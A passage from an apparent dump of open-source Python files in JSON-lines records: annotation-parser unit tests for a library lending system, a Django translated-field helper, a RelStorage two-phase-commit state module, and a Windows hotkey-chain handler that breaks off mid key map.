test_parse_expanded_jsonld(self):\n self.pool.loan_to(self.patron)\n\n data = dict()\n data['@type'] = [\"http://www.w3.org/ns/oa#Annotation\"]\n data[\"http://www.w3.org/ns/oa#motivatedBy\"] = [{\n \"@id\": Annotation.IDLING\n }]\n data[\"http://www.w3.org/ns/oa#hasBody\"] = [{\n \"@type\" : [\"http://www.w3.org/ns/oa#TextualBody\"],\n \"http://www.w3.org/ns/oa#bodyValue\": [{\n \"@value\": \"A good description of the topic that bears further investigation\"\n }],\n \"http://www.w3.org/ns/oa#hasPurpose\": [{\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }]\n }]\n data[\"http://www.w3.org/ns/oa#hasTarget\"] = [{\n \"http://www.w3.org/ns/oa#hasSelector\": [{\n \"@type\": [\"http://www.w3.org/ns/oa#FragmentSelector\"],\n 
\"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": [{\n \"@value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }]\n }],\n \"http://www.w3.org/ns/oa#hasSource\": [{\n \"@id\": self.identifier.urn\n }],\n }]\n\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(data[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(data[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_compacted_jsonld(self):\n self.pool.loan_to(self.patron)\n\n data = dict()\n data[\"@type\"] = \"http://www.w3.org/ns/oa#Annotation\"\n data[\"http://www.w3.org/ns/oa#motivatedBy\"] = {\n \"@id\": Annotation.IDLING\n }\n data[\"http://www.w3.org/ns/oa#hasBody\"] = {\n \"@type\": \"http://www.w3.org/ns/oa#TextualBody\",\n \"http://www.w3.org/ns/oa#bodyValue\": \"A good description of the topic that bears further investigation\",\n \"http://www.w3.org/ns/oa#hasPurpose\": {\n \"@id\": \"http://www.w3.org/ns/oa#describing\"\n }\n }\n data[\"http://www.w3.org/ns/oa#hasTarget\"] = {\n \"http://www.w3.org/ns/oa#hasSource\": {\n \"@id\": self.identifier.urn\n },\n \"http://www.w3.org/ns/oa#hasSelector\": {\n \"@type\": \"http://www.w3.org/ns/oa#FragmentSelector\",\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\": \"epubcfi(/6/4[chap01ref]!/4[body01]/10[para05]/3:10)\"\n }\n }\n\n data_json = json.dumps(data)\n expanded = jsonld.expand(data)[0]\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_jsonld_with_context(self):\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n expanded = jsonld.expand(data)[0]\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert self.patron.id == annotation.patron_id\n assert self.identifier.id == annotation.identifier_id\n assert Annotation.IDLING == annotation.motivation\n assert True == annotation.active\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasTarget\"][0]) == annotation.target\n assert json.dumps(expanded[\"http://www.w3.org/ns/oa#hasBody\"][0]) == annotation.content\n\n def test_parse_jsonld_with_bookmarking_motivation(self):\n \"\"\"You can create multiple bookmarks in a single book.\"\"\"\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld(motivation=Annotation.BOOKMARKING)\n data_json = json.dumps(data)\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n assert Annotation.BOOKMARKING == annotation.motivation\n\n # You can't create another bookmark at the exact same location --\n # you just get the same annotation again.\n annotation2 = AnnotationParser.parse(self._db, data_json, self.patron)\n assert annotation == annotation2\n\n # But unlike with IDLING, you _can_ create multiple bookmarks\n # for the same identifier, so long as the selector value\n # (ie. 
the location within the book) is different.\n data['target']['selector']['value'] = 'epubcfi(/3/4[chap01ref]!/4[body01]/15[para05]/3:10)'\n data_json = json.dumps(data)\n annotation3 = AnnotationParser.parse(self._db, data_json, self.patron)\n assert annotation3 != annotation\n assert 2 == len(self.patron.annotations)\n\n def test_parse_jsonld_with_invalid_motivation(self):\n self.pool.loan_to(self.patron)\n\n data = self._sample_jsonld()\n data[\"motivation\"] = \"not-a-valid-motivation\"\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_MOTIVATION == annotation\n\n def test_parse_jsonld_with_no_loan(self):\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_parse_jsonld_with_no_target(self):\n data = self._sample_jsonld()\n del data['target']\n data_json = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data_json, self.patron)\n\n assert INVALID_ANNOTATION_TARGET == annotation\n\n def test_parse_updates_existing_annotation(self):\n self.pool.loan_to(self.patron)\n\n original_annotation, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n original_annotation.active = False\n yesterday = utc_now() - datetime.timedelta(days=1)\n original_annotation.timestamp = yesterday\n\n data = self._sample_jsonld()\n data = json.dumps(data)\n\n annotation = AnnotationParser.parse(self._db, data, self.patron)\n\n assert original_annotation == annotation\n assert True == annotation.active\n assert annotation.timestamp > yesterday\n\n def test_parse_treats_duplicates_as_interchangeable(self):\n self.pool.loan_to(self.patron)\n\n # Due to an earlier race condition, two duplicate annotations\n # were put in the database.\n a1, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n\n a2, ignore = create(\n self._db, Annotation,\n patron_id=self.patron.id,\n identifier_id=self.identifier.id,\n motivation=Annotation.IDLING,\n )\n\n assert a1 != a2\n\n # Parsing the annotation again retrieves one or the other\n # of the annotations rather than crashing or creating a third\n # annotation.\n data = self._sample_jsonld()\n data = json.dumps(data)\n annotation = AnnotationParser.parse(self._db, data, self.patron)\n assert annotation in (a1, a2)\n\n def test_parse_jsonld_with_patron_opt_out(self):\n self.pool.loan_to(self.patron)\n data = self._sample_jsonld()\n data_json = json.dumps(data)\n\n self.patron.synchronize_annotations=False\n annotation = AnnotationParser.parse(\n self._db, data_json, self.patron\n )\n assert PATRON_NOT_OPTED_IN_TO_ANNOTATION_SYNC == annotation\n"} {"ext": "py", "sha": "1a300e2fcaaccd53fb1f1b3fc7df607e9426948c", "content": "from django.utils import translation\n\n\nclass TranslatedField(object):\n def __init__(self, en_field, es_field):\n self.en_field = en_field\n self.es_field = es_field\n\n def __get__(self, instance, owner):\n if translation.get_language() == 'es':\n return getattr(instance, self.es_field)\n else:\n return getattr(instance, self.en_field)\n"} {"ext": "py", "sha": "1a300e54796c2cac920e94e6eb43542d2c9b4bec", "content": "##############################################################################\n#\n# Copyright (c) 2019 Zope Foundation and 
Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\nTPC protocol state management.\n\nThe various states in which a storage instance can find itself during\ntwo-phase commit are complicated. This package presents a set of\nobjects that encapsulate various possibilities. In this way we can\ntest independent states...independently, and the state transitions are\nexplicit.\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\n\nfrom transaction.interfaces import NoTransaction\nfrom transaction._transaction import rm_key\nfrom transaction import get as get_thread_local_transaction\n\nfrom perfmetrics import statsd_client\n\nfrom zope.interface import implementer\n\nfrom ZODB.POSException import ReadOnlyError\nfrom ZODB.POSException import StorageTransactionError\n\nfrom ..interfaces import ITPCStateNotInTransaction\nfrom ..interfaces import ITPCStateDatabaseAvailable\nfrom ...adapters.connections import ClosedConnection\nfrom ..._util import Lazy as BaseLazy\nfrom ..._util import get_boolean_from_environ\n\nfrom .temporary_storage import TemporaryStorage\n\nlogger = logging.getLogger(__name__)\n\n_CLOSED_CONNECTION = ClosedConnection()\n\n#: Set the ``RELSTORAGE_LOCK_EARLY`` environment variable if you\n#: experience deadlocks or failures to commit (``tpc_finish``). This\n#: will cause the commit lock to be taken as part of ``tpc_vote``\n#: (similar to RelStorage 2.x) instead of deferring it until\n#: ``tpc_finish``.\n#:\n#: If this is necessary, this is probably a bug in RelStorage; please report\n#: it.\nLOCK_EARLY = get_boolean_from_environ(\n 'RELSTORAGE_LOCK_EARLY',\n False,\n logger=logger,\n)\n\n\nclass _LazyResource(BaseLazy):\n\n # If not None, a callable ``(storage, resource, force)``\n # that aborts the *resource*, possibly forcefully (*force*).\n # The return value will be the new value in the object\n # instance.\n abort_function = None\n # If not None, a callable ``(storage, resource)`` to clean up\n # any use of the *resource* after success.\n release_function = None\n\n def _stored_value_for_name_in_inst(self, value, name, inst):\n # type: (Any, str, SharedTPCState) -> None\n if name == 'store_connection':\n # Try to do this first\n inst._used_resources.insert(0, self)\n else:\n inst._used_resources.append(self)\n\n def aborter(self, func):\n assert not isinstance(func, _LazyResource)\n self.abort_function = func\n return self\n\n def releaser(self, func):\n assert not isinstance(func, _LazyResource)\n self.release_function = func\n return self\n\n def cleaner(self, func):\n self.abort_function = self.release_function = func\n return self\n\n\nclass SharedTPCState(object):\n \"\"\"\n Contains attributes marking resources that *might* be used during the commit\n process. 
If any of them are, then the `abort` method takes care of cleaning them up.\n\n Accessing a resource implicitly begins it, if needed.\n \"\"\"\n\n # pylint:disable=method-hidden\n\n prepared_txn = None\n transaction = None\n not_in_transaction_state = None\n read_only = False # Or we wouldn't allocate this object.\n\n def __init__(self, initial_state, storage, transaction):\n self.initial_state = initial_state\n self._storage = storage\n self.transaction = transaction\n self._used_resources = []\n\n @_LazyResource\n def local_client(self):\n return self._storage._cache.local_client\n\n @_LazyResource\n def store_connection(self):\n conn = self._storage._store_connection_pool.borrow()\n # Report on the connection we will use.\n # https://github.com/zodb/relstorage/issues/460\n logger.info(\"Using store connection %s\", conn)\n return conn\n\n @store_connection.aborter\n def store_connection(self, storage, store_connection, force):\n try:\n adapter = storage._adapter\n if store_connection:\n # It's possible that this connection/cursor was\n # already closed if an error happened (which would\n # release the locks). Don't try to re-open it.\n adapter.locker.release_commit_lock(store_connection.cursor)\n\n # Though, this might re-open it.\n adapter.txncontrol.abort(\n store_connection,\n self.prepared_txn)\n\n if force:\n store_connection.drop()\n finally:\n storage._store_connection_pool.replace(store_connection)\n return _CLOSED_CONNECTION\n\n @store_connection.releaser\n def store_connection(self, storage, store_connection):\n storage._store_connection_pool.replace(store_connection)\n return _CLOSED_CONNECTION\n\n @_LazyResource\n def load_connection(self):\n return self._storage._load_connection\n\n @load_connection.aborter\n def load_connection(self, _storage, load_connection, force):\n if force:\n load_connection.drop()\n else:\n load_connection.rollback_quietly()\n load_connection.exit_critical_phase()\n return _CLOSED_CONNECTION\n\n @load_connection.releaser\n def load_connection(self, _storage, load_connection):\n load_connection.rollback_quietly()\n load_connection.exit_critical_phase()\n return _CLOSED_CONNECTION\n\n @_LazyResource\n def blobhelper(self):\n blobhelper = self._storage.blobhelper\n blobhelper.begin()\n return blobhelper\n\n @blobhelper.aborter\n def blobhelper(self, _storage, blobhelper, _force):\n blobhelper.abort()\n\n @blobhelper.releaser\n def blobhelper(self, _storage, blobhelper):\n blobhelper.clear_temp()\n\n def has_blobs(self):\n # pylint:disable=no-member\n return (\n 'blobhelper' in self.__dict__\n and self.blobhelper is not None\n and self.blobhelper.txn_has_blobs\n )\n\n @BaseLazy\n def cache(self):\n return self._storage._cache\n\n @BaseLazy\n def adapter(self):\n return self._storage._adapter\n\n @_LazyResource\n def temp_storage(self):\n return TemporaryStorage()\n\n @temp_storage.cleaner\n def temp_storage(self, _storage, temp_storage, _force=None):\n temp_storage.close()\n\n def has_temp_data(self):\n return 'temp_storage' in self.__dict__ and self.temp_storage\n\n @_LazyResource\n def _statsd_buf(self):\n return []\n\n @_statsd_buf.cleaner\n def _statds_buf(self, _storage, buf, _force=None):\n client = statsd_client()\n if client is not None and buf:\n client.sendbuf(buf)\n\n def stat_timing(self, stat, value, rate=1):\n \"\"\"\n Record a timing value.\n\n For compatibility with the default settings of ``perfmetrics``,\n the stat name should end in ``.t``\n\n The *value* should be a floating point difference of seconds\n (eg, ``time.time() - 
time.time()``). This will be converted to an integer\n number of milliseconds (again for consistency with ``perfmetrics``).\n \"\"\"\n client = statsd_client()\n if client is not None:\n # scale from float seconds to milliseconds\n value = int(value * 1000.0)\n client.timing(stat, value, rate, self._statsd_buf)\n\n def stat_count(self, stat, value, rate=1):\n client = statsd_client()\n if client is not None:\n client.incr(stat, value, rate, self._statsd_buf)\n\n def __cleanup(self, method_name, method_args):\n storage = self._storage\n resources = self._used_resources\n self._used_resources = () # No more opening resources.\n\n exceptions = []\n\n for resource in resources:\n assert resource.__name__ in vars(self)\n\n cleaner = getattr(resource, method_name)\n if not cleaner:\n setattr(self, resource.__name__, None)\n continue\n\n value = getattr(self, resource.__name__)\n new_value = None\n try:\n new_value = cleaner(self, storage, value, *method_args)\n except Exception as ex: # pylint:disable=broad-except\n exceptions.append(ex)\n setattr(self, resource.__name__, new_value)\n\n if exceptions: # pragma: no cover\n # This usually indicates a bug in RelStorage that should be fixed.\n raise Exception(\"Failed to close one or more resources: %s\" % (exceptions,))\n\n def abort(self, force=False):\n self.__cleanup('abort_function', (force,))\n\n def release(self):\n self.__cleanup('release_function', ())\n\n\n@implementer(ITPCStateDatabaseAvailable)\nclass AbstractTPCStateDatabaseAvailable(object):\n\n __slots__ = (\n 'shared_state',\n )\n\n # - store\n # - restore/restoreBlob\n # - deleteObject\n # - undo\n\n # should raise ReadOnlyError if the storage is read only.\n\n # - tpc_vote should raise StorageTransactionError\n\n # Because entering tpc_begin wasn't allowed if the storage was\n # read only, this needs to happen in the \"not in transaction\"\n # state.\n\n def __init__(self, shared_state):\n self.shared_state = shared_state # type: SharedTPCState\n\n @property\n def transaction(self):\n return self.shared_state.transaction\n\n @property\n def initial_state(self):\n return self.shared_state.initial_state\n\n @property\n def store_connection(self):\n return self.shared_state.store_connection\n\n def __repr__(self):\n result = \"<%s at 0x%x stored_count=%s %s\" % (\n type(self).__name__,\n id(self),\n len(getattr(self, 'temp_storage', ()) or ()),\n self._tpc_state_transaction_data(),\n )\n\n extra = self._tpc_state_extra_repr_info()\n for k, v in extra.items():\n result += ' %s=%r' % (k, v)\n result += '>'\n return result\n\n def _tpc_state_extra_repr_info(self):\n return {}\n\n def _tpc_state_transaction_data(self):\n # Grovels around in the transaction object and tries to find interesting\n # things to include.\n\n # The ZODB Connection passes us an internal TransactionMetaData\n # object; the real transaction object stores a reference to that in its data,\n # keyed off the connection.\n # We may or may not be able to get the real transaction using transaction.get(),\n # depending on if we are using the global (thread local) transaction manager or not.\n try:\n global_tx = get_thread_local_transaction()\n except NoTransaction:\n # It's in explicit mode and we're not using it.\n return \" tx=%r\" % (self.transaction,)\n\n tx_data = getattr(global_tx, '_data', None)\n if not tx_data:\n # No data stored on the transaction (or the implementation changed!)\n return \" tx=%r\" % (self.transaction,)\n\n for v in tx_data.values():\n if v is self.transaction:\n # Yes, we found the metadata 
that ZODB uses, so we are\n # joined to this transaction.\n break\n else:\n return \" tx=%r\" % (tx_data, self.transaction,)\n\n resources = sorted(global_tx._resources, key=rm_key)\n return \"transaction=%r resources=%r\" % (global_tx, resources)\n\n def tpc_finish(self, storage, transaction, f=None, _time=None): # pylint:disable=unused-argument\n # For the sake of some ZODB tests, we need to implement this everywhere,\n # even if it's not actually usable, and the first thing it needs to\n # do is check the transaction.\n if transaction is not self.transaction:\n raise StorageTransactionError('tpc_finish called with wrong transaction')\n raise NotImplementedError(\"tpc_finish not allowed in this state.\")\n\n def tpc_begin(self, _storage, transaction):\n # Ditto as for tpc_finish\n raise StorageTransactionError('tpc_begin not allowed in this state', type(self))\n\n def tpc_abort(self, transaction, force=False):\n if not force:\n if transaction is not self.transaction:\n return self\n\n self.shared_state.abort(force)\n return self.initial_state\n\n def no_longer_stale(self):\n return self\n\n def stale(self, e):\n return Stale(self, e)\n\n def close(self):\n if self.shared_state is not None:\n self.tpc_abort(None, True)\n self.shared_state = None\n\n\n@implementer(ITPCStateNotInTransaction)\nclass NotInTransaction(object):\n # The default state, when the storage is not attached to a\n # transaction.\n\n __slots__ = (\n 'last_committed_tid_int',\n 'read_only',\n 'begin_factory',\n )\n\n transaction = None\n\n def __init__(self, begin_factory, read_only, committed_tid_int=0):\n self.begin_factory = begin_factory\n self.read_only = read_only\n self.last_committed_tid_int = committed_tid_int\n\n def with_committed_tid_int(self, committed_tid_int):\n return NotInTransaction(\n self.begin_factory,\n self.read_only,\n committed_tid_int\n )\n\n def tpc_abort(self, *args, **kwargs): # pylint:disable=arguments-differ,unused-argument,signature-differs\n # Nothing to do\n return self\n\n def _no_transaction(self, *args, **kwargs):\n raise StorageTransactionError(\"No transaction in progress\")\n\n tpc_finish = tpc_vote = _no_transaction\n checkCurrentSerialInTransaction = _no_transaction\n\n def store(self, *_args, **_kwargs):\n if self.read_only:\n raise ReadOnlyError()\n self._no_transaction()\n\n restore = deleteObject = undo = restoreBlob = store\n\n def tpc_begin(self, storage, transaction): # XXX: Signature needs to change.\n if self.read_only:\n raise ReadOnlyError()\n if transaction is self.transaction: # Also handles None.\n raise StorageTransactionError(\"Duplicate tpc_begin calls for same transaction.\")\n state = SharedTPCState(self, storage, transaction)\n try:\n return self.begin_factory(state)\n except:\n state.abort()\n raise\n\n @property\n def initial_state(self):\n return self\n\n # This object appears to be false.\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n def close(self):\n pass\n\n\n@implementer(ITPCStateNotInTransaction)\nclass Stale(object):\n \"\"\"\n An error that lets us know we are stale\n was encountered.\n\n Just about all accesses to this object result in\n re-raising that error.\n \"\"\"\n\n transaction = None\n last_committed_tid_int = 0\n\n def __init__(self, previous_state, stale_error):\n self.previous_state = previous_state\n self.stale_error = stale_error\n\n def _stale(self, *args, **kwargs):\n raise self.stale_error\n\n store = restore = checkCurrentSerialInTransaction = _stale\n undo = deleteObject = restoreBlob = _stale\n tpc_begin = 
tpc_finish = tpc_vote = _stale\n\n def tpc_abort(self, *args, **kwargs):\n return self.previous_state.tpc_abort(*args, **kwargs)\n\n @property\n def initial_state(self):\n return self.previous_state.initial_state\n\n def no_longer_stale(self):\n return self.previous_state\n\n def stale(self, _e):\n return self\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n"} {"ext": "py", "sha": "1a300feeb1489d80c5e1aa38555ac20a50c24d8e", "content": "from .json_data_provider import *\n"} {"ext": "py", "sha": "1a3011922de5be60416538f7f831f8861157210d", "content": "\nIGNORED = None\nACTION_PENDING = 1\n\n# Bigger than necessary\n_MAX_VK_KEY = 0x200\n_VK_KEY_MASK = 0x1ff\n_CURRENT_KEY_STATE = [False] * _MAX_VK_KEY\n_MODIFIERS = set()\n\n\ndef on_key_hook(vk_code, is_down, special_modifier_state = None):\n \"\"\"\n Module-wide storage for the current key state.\n\n :param vk_code:\n :param is_down:\n :param special_modifier_state: map of vcodes to the up/down state\n (True == is_down, False == !is_down). This is part of the\n windows key state / locked desktop work-around.\n :return: True if it's a recognized key, False if it isn't known.\n \"\"\"\n if special_modifier_state is not None:\n for k, v in special_modifier_state.items():\n if k != vk_code and k in _MODIFIER_KEYS:\n if _CURRENT_KEY_STATE[k] != v:\n print(\"DEBUG modifier {0} does not match inner state.\".format(k))\n if k in _MODIFIER_KEYS:\n if is_down:\n _MODIFIERS.add(k)\n else:\n _MODIFIERS.remove(k)\n _CURRENT_KEY_STATE[k] = v\n if 0 <= vk_code <= _MAX_VK_KEY:\n _CURRENT_KEY_STATE[vk_code] = is_down\n if vk_code in _MODIFIER_KEYS:\n if is_down:\n _MODIFIERS.add(vk_code)\n else:\n _MODIFIERS.remove(vk_code)\n return True\n return False\n\n\nclass KeyOverride(object):\n \"\"\"\n Captures all key presses. 
Certain keys map to actions.\n\n All keys are simple (straight up keys; modifiers are considered keys).\n One key per action.\n \"\"\"\n def __init__(self, key_commands=None):\n self.__keys = {}\n\n if key_commands is not None:\n self.set_key_actions(key_commands)\n\n def set_key_actions(self, actions):\n assert isinstance(actions, dict)\n # FIXME use a dict instead\n\n # TODO in the future we may allow \"shift+left\" type keys here.\n # The implementation in key_action would just check the _MODIFIERS\n # state.\n new_key_actions = {}\n for key, action in actions.items():\n assert isinstance(action, list) or isinstance(action, tuple)\n action = tuple(action)\n key = key.strip().lower()\n if key in VK_ALIASES:\n for k in VK_ALIASES[key]:\n if k in MODIFIERS:\n # TODO better error / warning\n # Note use of user's value \"key\", rather than internal \"k\"\n print(\"CONFIG ERROR: Simple keys are not allowed to be modifiers: {0}\".format(key))\n elif k in STR_VK_MAP:\n # print(\"DEBUG KeyOverride: assigning {0} = `{1}`\".format(hex(STR_VK_MAP[k]), action))\n new_key_actions[STR_VK_MAP[k]] = action\n else:\n # TODO better error / warning\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: Simple keys are not allowed to be modifiers: {0}\".format(key))\n elif key in STR_VK_MAP:\n new_key_actions[STR_VK_MAP[key]] = action\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Simple key not a known key: {0}\".format(key))\n self.__keys = new_key_actions\n\n def reset(self):\n pass\n\n def key_action(self, vk_code, is_down):\n if vk_code in _MODIFIER_KEYS:\n # Ignore all modifier keys, so the \"release\" from a mode switch works right.\n # This ties in with modifiers not allowed as simple keys.\n return IGNORED\n if not is_down and vk_code in self.__keys:\n return self.__keys[vk_code]\n # Prevent all other keys from working\n return ACTION_PENDING\n\n\nclass HotKeyChain(object):\n \"\"\"\n Takes a keypress, and manages the state of the keys.\n It stores a list of key chains to action pairs.\n\n There should be one of these per system \"mode\".\n \"\"\"\n\n def __init__(self, chain_commands=None):\n self.__combos = []\n\n # The modifiers which are down and associated with the active combos\n self.__active_modifiers = []\n\n # The previous key in the combo chain; we're waiting for it to be off.\n self.__active_key = None\n\n # The active combo chains. Index 0 in each item is the remaining list\n # of key down actions to look for ([0] meaning the next one). 
Index 1\n # in each item is the command to return.\n self.__active_combos = []\n\n # Set to True to prevent the OS shell from using the \"windows\" key.\n self.block_win_key = False\n\n if chain_commands is not None:\n self.set_key_chains(chain_commands)\n\n def set_key_chains(self, chain_commands):\n assert isinstance(chain_commands, dict)\n\n combos = []\n for key_chain, command in chain_commands.items():\n assert isinstance(command, list) or isinstance(command, tuple)\n keys = parse_combo_str(key_chain)\n if len(keys) > 0:\n # We store modifiers a little differently.\n # Rather than having a list of lists, which must be\n # carefully examined, we instead construct the\n # permutations of the keys, and store each of those as\n # their own combo.\n permutation_keys = []\n _key_permutations(keys[0], 0, [], permutation_keys)\n for perm in permutation_keys:\n # print(\"DEBUG Combo {0} + {1} => {2}\".format(perm, keys[1:], command))\n combos.append((perm, keys[1:], tuple(command)))\n\n # Change the variable in a single command.\n self.__combos = combos\n self.reset()\n\n def reset(self):\n self.__active_combos = []\n self.__active_modifiers = []\n self.__active_key = None\n\n def key_action(self, vk_code, is_down):\n \"\"\"\n\n :param is_down:\n :param vk_code:\n :return: IGNORED if the key should be passed through,\n ACTION_PENDING if the key should be blocked from passing to\n another application, but does not complete an action, or\n a list of the action to run.\n \"\"\"\n if _MODIFIERS == self.__active_modifiers:\n if self.__active_key is None or not _CURRENT_KEY_STATE[self.__active_key]:\n # The previous key is no longer down.\n self.__active_key = None\n\n next_combos = []\n for ac in self.__active_combos:\n if vk_code in ac[0][0]:\n ac[0].pop(0)\n if len(ac[0]) <= 0:\n # We have our key\n command = ac[1]\n self.reset()\n # print(\"DEBUG keys generated command {0}\".format(command))\n return command\n next_combos.append(ac)\n if len(next_combos) > 0:\n self.__active_key = vk_code\n self.__active_combos = next_combos\n return ACTION_PENDING\n elif is_down:\n # A new key was pressed, which isn't a key in a pending\n # combo. Reset our hot keys, and return an ignored.\n self.reset()\n # else, the previous active key is still down; wait for it\n # to come up.\n else:\n # Discover which combo matches the modifiers.\n self.reset()\n new_active = []\n for combo in self.__combos:\n if combo[0] == _MODIFIERS:\n new_active.append((list(combo[1]), combo[2]))\n if len(new_active) > 0:\n self.__active_key = None\n self.__active_combos = new_active\n self.__active_modifiers = set(_MODIFIERS)\n # We still pass on the modifiers to the OS, just in case it's not\n # a match.\n\n if self.block_win_key and vk_code in _WIN_KEYS:\n return ACTION_PENDING\n return IGNORED\n\n\ndef parse_combo_str(chain_description):\n \"\"\"\n Special compact form of the string. For each key combo part,\n we make a \"string\" of the only VK codes that must be \"down\" in\n order to trigger the next part of the chain.\n\n The format is \"primary + primary + ... + key, key, key, ...\"\n\n :param chain_description:\n :return: list of aliased combo lists. So, the return will be\n [primary, key1, key2, ...], where \"primary\" are the primary\n keys that must be pressed through the whole action. Key1 and\n key2 (and so on) are the keys that must be pressed and released\n in order (the last key will respond on key down). 
Each key\n in the list is itself a list of alternate keys.\n \"\"\"\n assert isinstance(chain_description, str)\n\n key_parts = chain_description.split(\",\")\n # Parse the primary first. These are separated by \"+\".\n # The last key in the list is the \"non-always-down\" key,\n # meaning it's the first in the key chain.\n primary_list = []\n primary_keys = key_parts[0].split(\"+\")\n secondary_keys = [primary_keys[-1]]\n secondary_keys.extend(key_parts[1:])\n for key_text in primary_keys[:-1]:\n primary_key = []\n key_text = key_text.strip().lower()\n if key_text in VK_ALIASES:\n for k in VK_ALIASES[key_text]:\n if k in STR_VK_MAP:\n if k in MODIFIERS:\n primary_key.append(STR_VK_MAP[k])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Primary key not a modifier {0}\".format(k))\n else:\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key_text in STR_VK_MAP:\n if key_text in MODIFIERS:\n primary_key.append(STR_VK_MAP[key_text])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: Primary key not a modifier {0}\".format(key_text))\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: unknown key code [{0}]\".format(key_text))\n if len(primary_key) > 0:\n primary_list.append(primary_key)\n\n chain = [primary_list]\n\n for key_text in secondary_keys:\n key = []\n key_text = key_text.strip().lower()\n if key_text in VK_ALIASES:\n for k in VK_ALIASES[key_text]:\n if k in STR_VK_MAP:\n if k in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: secondary key is a modifier {0}\".format(k))\n else:\n key.append(STR_VK_MAP[k])\n else:\n print(\"ERROR IN SETUP: alias {0} not in vk map\".format(k))\n elif key_text in STR_VK_MAP:\n if key_text in MODIFIERS:\n # TODO better error / warning\n print(\"CONFIG ERROR: secondary key is a modifier {0}\".format(key_text))\n else:\n key.append(STR_VK_MAP[key_text])\n else:\n # TODO better error / warning\n print(\"CONFIG ERROR: unknown key code {0}\".format(key_text))\n if len(key) > 0:\n chain.append(key)\n return chain\n\n\ndef _key_permutations(key_alt_list, alt_index, current_list, final_list):\n \"\"\"\n Takes a list of key alternates ([ [k1a, k1b, ...], [k2a, k2b, ...], ...])\n and transforms this into the\n\n :param key_alt_list:\n :return:\n \"\"\"\n for key in key_alt_list[alt_index]:\n next_list = list(current_list)\n next_list.append(key)\n if alt_index + 1 >= len(key_alt_list):\n final_list.append(set(next_list))\n else:\n _key_permutations(key_alt_list, alt_index + 1, next_list, final_list)\n\n\ndef vk_to_names(vk):\n maps = []\n for vk_str, code in STR_VK_MAP.items():\n # There are multiple mappings; return them all.\n if code == vk:\n maps.append(vk_str)\n if len(maps) <= 0:\n maps.append(\"#{0}\".format(hex(vk)))\n return maps\n\n\ndef is_vk_modifier(vk):\n return vk in _MODIFIER_KEYS\n\n\n# Built-in alias VK keys for user-specified keys\nVK_ALIASES = {\n \"win\": [\"lwin\", \"rwin\"],\n \"shift\": [\"lshift\", \"rshift\"],\n \"control\": [\"lcontrol\", \"rcontrol\"],\n \"alt\": [\"lalt\", \"ralt\"],\n \"menu\": [\"lmenu\", \"rmenu\"],\n}\n\n\n# Set of all recognized modifiers\nMODIFIERS = {\n \"shift\",\n \"lshift\",\n \"rshift\",\n \"control\",\n \"ctrl\",\n \"lcontrol\",\n \"lctrl\",\n \"rcontrol\",\n \"rctrl\",\n \"alt\",\n \"lalt\",\n \"ralt\",\n \"lwin\",\n \"rwin\",\n \"lmenu\",\n \"rmenu\",\n \"apps\",\n \"caps-lock\",\n}\n\n# https://msdn.microsoft.com/en-us/library/windows/desktop/dd375731(v=vs.85).aspx\nSTR_VK_MAP = {\n \"lmb\": 0x01, # VK_LBUTTON Left mouse 
